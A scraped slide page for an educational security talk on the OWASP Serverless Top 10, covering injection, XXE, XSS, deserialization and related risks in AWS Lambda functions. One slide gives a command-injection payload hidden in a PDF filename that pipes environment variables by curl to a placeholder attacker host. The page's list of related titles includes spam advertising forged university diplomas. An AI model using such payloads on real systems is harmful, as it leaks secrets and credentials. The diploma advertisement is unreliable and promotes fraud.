Cyber security and its impact on E commerce
 
Taming Distributed Systems: Key Insights from Wix's Large-Scale Experience - ...
Taming Distributed Systems: Key Insights from Wix's Large-Scale Experience - ...Taming Distributed Systems: Key Insights from Wix's Large-Scale Experience - ...
Taming Distributed Systems: Key Insights from Wix's Large-Scale Experience - ...
 
What is Advanced Excel and what are some best practices for designing and cre...
What is Advanced Excel and what are some best practices for designing and cre...What is Advanced Excel and what are some best practices for designing and cre...
What is Advanced Excel and what are some best practices for designing and cre...
 
Automate your Kamailio Test Calls - Kamailio World 2024
Automate your Kamailio Test Calls - Kamailio World 2024Automate your Kamailio Test Calls - Kamailio World 2024
Automate your Kamailio Test Calls - Kamailio World 2024
 
Tech Tuesday - Mastering Time Management Unlock the Power of OnePlan's Timesh...
Tech Tuesday - Mastering Time Management Unlock the Power of OnePlan's Timesh...Tech Tuesday - Mastering Time Management Unlock the Power of OnePlan's Timesh...
Tech Tuesday - Mastering Time Management Unlock the Power of OnePlan's Timesh...
 
办理学位证(UQ文凭证书)昆士兰大学毕业证成绩单原版一模一样
办理学位证(UQ文凭证书)昆士兰大学毕业证成绩单原版一模一样办理学位证(UQ文凭证书)昆士兰大学毕业证成绩单原版一模一样
办理学位证(UQ文凭证书)昆士兰大学毕业证成绩单原版一模一样
 
Odoo 14 - eLearning Module In Odoo 14 Enterprise
Odoo 14 - eLearning Module In Odoo 14 EnterpriseOdoo 14 - eLearning Module In Odoo 14 Enterprise
Odoo 14 - eLearning Module In Odoo 14 Enterprise
 
A healthy diet for your Java application Devoxx France.pdf
A healthy diet for your Java application Devoxx France.pdfA healthy diet for your Java application Devoxx France.pdf
A healthy diet for your Java application Devoxx France.pdf
 
Machine Learning Software Engineering Patterns and Their Engineering
Machine Learning Software Engineering Patterns and Their EngineeringMachine Learning Software Engineering Patterns and Their Engineering
Machine Learning Software Engineering Patterns and Their Engineering
 
PREDICTING RIVER WATER QUALITY ppt presentation
PREDICTING RIVER WATER QUALITY ppt presentationPREDICTING RIVER WATER QUALITY ppt presentation
PREDICTING RIVER WATER QUALITY ppt presentation
 
MYjobs Presentation Django-based project
MYjobs Presentation Django-based projectMYjobs Presentation Django-based project
MYjobs Presentation Django-based project
 
Software Project Health Check: Best Practices and Techniques for Your Product...
Software Project Health Check: Best Practices and Techniques for Your Product...Software Project Health Check: Best Practices and Techniques for Your Product...
Software Project Health Check: Best Practices and Techniques for Your Product...
 

OWASP Serverless Top 10

  • 2. About me Chandrapal Badshah Security Enthusiast Build, Break, Build guy Would love to talk about plants ;) Contact: ● twitter.com/@bnchandrapal ● github.com/Chan9390
  • 3. START WITH WHY - Simon Sinek
  • 4. Once upon a time... Database Web Server CPU Memory Web Application Static Files
  • 6. But ... Database Web Server CPU Memory Web Application Static Files Security: maintaining/updating operating system with security patches, WAF/firewall configuration, network monitoring, etc
  • 9. Introduction to Microservices Still a lot of manual work (depending on the deployment method) to scale it. Security tasks depend on the deployment method too.
  • 10. Introduction to Serverless The phrase “serverless” doesn’t mean servers are no longer involved. It simply means that developers no longer have to think that much about them. Computing resources get used as services without having to manage around physical capabilities or limits. https://readwrite.com/2012/10/15/why-the-future-of-software-and-apps-is-serverless/
  • 13. Serverless Tools & Frameworks
  • 14. Who uses Serverless (AWS Lambda) https://aws.amazon.com/lambda/resources/customer-case-studies/
  • 15. Features of Function-as-a-Service ➔ Stateless functions ➔ Complete abstraction ➔ Instant, Scalable and event-driven ➔ Pay for what you use ➔ Free trials (AWS lambda gives 1,000,000* lambda triggers for free every month) ➔ There is a default timeout ➔ The function guidelines are defined by the Cloud Service Provider ➔ Multiple Languages supported
  • 16. DEMO - Deploying Serverless App
  • 19.
  • 21. Do you think OWASP Serverless Top 10 vulnerabilities are different than OWASP Top 10 ?
  • 22. Do you think OWASP Serverless Top 10 vulnerabilities are different than OWASP Top 10 ? ● The way the apps are created are similar to that of server based applications ● There’s not a lot of data from organizations on how they use serverless functions in production (and the security issues faced)
  • 23. Let’s jump into OWASP Serverless Top 10
  • 24. A1: Injection ● Serverless doesn’t only support HTTP triggers, they support cloud storage events, database changes, etc ● SQL/NoSQL injection ● OS Command Injection ● Code Injection - the severity depends on the permissions given to the vulnerable lambda function
  • 25. An example scenario: CV filtering system User sends mail with CV attached Email reaches the server AWS SNS sends notification to Lambda Lambda gets the mail, parses it if there’s a PDF attachment
  • 26. Can you see the bug ?
  • 27. Checks if the file has file name Checks if the filename ends with .pdf Appends the filename with /tmp Executes a command pdftotext
  • 28. Payload (to print the environment variables) foobar;env|curl -H "Content-Type: text/plain" -X POST -d @- http://attacker.site/collector #.pdf
  • 29. A2: Broken Authentication ● Functions are Stateless ● Multiple entry points, services, events and triggers and no continuous flow - things can get worse ● Common example: the functions for internal use only are available to all
  • 30. A3: Sensitive Data Exposure ● Depends on the architecture just like other server based applications ● Common example: having functions disclosing logs in some specific endpoint
  • 31. A bug I recently found
  • 32. A4: XML External Entity ● Insecure way of parsing XML files by the serverless function ● The exploitability may not always be fruitful
  • 34. Vulnerable code … Downloads the XML file from bucket and parses it.
  • 37. A5: Broken Access Control ● Functions with over privileges ● If functions are allowed to access anything on the cloud account, then attacker too if he exploits some vulnerability like code execution
  • 38. A6: Security Misconfiguration ● Not just the function but how the function interacts with the environment ● Because of the complexity which is introduced due to increased features/functions, it’s very easy for security misconfiguration ● Can lead to DoS/timeouts ● Example: Public S3 buckets
  • 39. A7: Cross Site Scripting (XSS) ● Most common bug affects serverless functions as well ● Mostly due to lack of user input sanitization
  • 40. Find the bug… (scenario) User sends mail Email reaches the server AWS SNS sends notification to Lambda Lambda gets the mail, parses it and sends the message content to moderator dashboard
  • 42. Find the bug… Gets the message content Sends the message content to dashboard
  • 43.
  • 44. A8: Insecure Deserialization ● Common in Python and NodeJS, but also affects Java and dotNET ● Mostly introduced due to insecure use of 3rd party libraries
  • 46. The payload in request…
  • 48. A9: Using components with known vulnerabilities ● Using dependencies which are insecure ● Most commonly found ● Not every vulnerability will affect serverless functions ● Doesn’t always guarantee you remote exploitation
  • 49. A10: Insufficient Logging and Monitoring ● Serverless auditing is even more difficult than traditional web applications ● Since the client interacts directly with the serverless functions there is no place for implementing WAFs or any active monitoring systems ● This actually helps attackers
  • 52. Lambda Logs (in case of huge payload)
  • 53. Resources OWASP Serverless Top 10: https://www.owasp.org/index.php/OWASP_Serverless_Top_10_Project OWASP Serverless Top 10 GitHub repo: https://github.com/OWASP/Serverless-Top-10-Project Serverless Security - Function-as-a-Service: https://www.youtube.com/watch?v=c5ZHPc_yG4g Securing Serverless Applications Step-by-step: https://www.youtube.com/watch?v=B3j4xql7we0 AWS Serverless Functions: https://github.com/aws-samples/aws-serverless-workshops PureSec Serverless Top 10: https://github.com/puresec/sas-top-10
  • 54. Stay tuned ! Damn Vulnerable Serverless App on its way

Editor's Notes

  1. The control was with the server. (Give example, cookie is still serverside in serverless)
  2. The control was with the server. (Give example, cookie is still serverside in serverless)
  3. The control was with the server. (Give example, cookie is still serverside in serverless)